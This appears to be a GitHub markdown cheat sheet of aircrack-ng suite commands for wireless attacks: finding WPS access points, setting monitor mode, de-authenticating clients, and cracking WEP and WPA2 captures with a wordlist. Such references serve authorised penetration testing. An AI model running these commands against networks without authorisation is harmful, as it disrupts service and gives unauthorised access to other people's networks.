Skip to content

Latest commit

 

History

History
63 lines (40 loc) · 1.19 KB

hacking-wireless-cheat-sheet.md

File metadata and controls

63 lines (40 loc) · 1.19 KB

Hacking wireless cheat sheet

Discover the AP, ESSID, and BSSID of a device router with WPS enabled

wash -i [INTERFACE]

airmon-ng

Kill any conflicting processes

airmon-ng check kill

Set monitor mode to an interface (create monitor mode virtualized adapter)

airmon-ng start [INTERFACE]

Wizard

airoscript-ng

De-authentication attack

De-authenticate and desassociate a client.

aireplay-ng --deauth 25 -h [TARGET MAC] -b [AP MAC] [INTERFACE]

Crack WEP password

aircrack-ng 'wireless-data-01.cap'

Crack WPA2 password

aircrack-ng -a2 -b [TARGET BSSID] -w dictionary.txt 'wireless-data-01.cap'

-a: Technique used to crack the handshake. 2=WPA technique.

-b: BSSID of the target router.

-w: Wordlist.

<- Back to index


License

© 2023 javierizquierdovera.com

Licensed under the Apache License, Version 2.0 (LICENSE-APACHE) or the MIT license (LICENSE-MIT), at your option.

SPDX-License-Identifier: (Apache-2.0 OR MIT)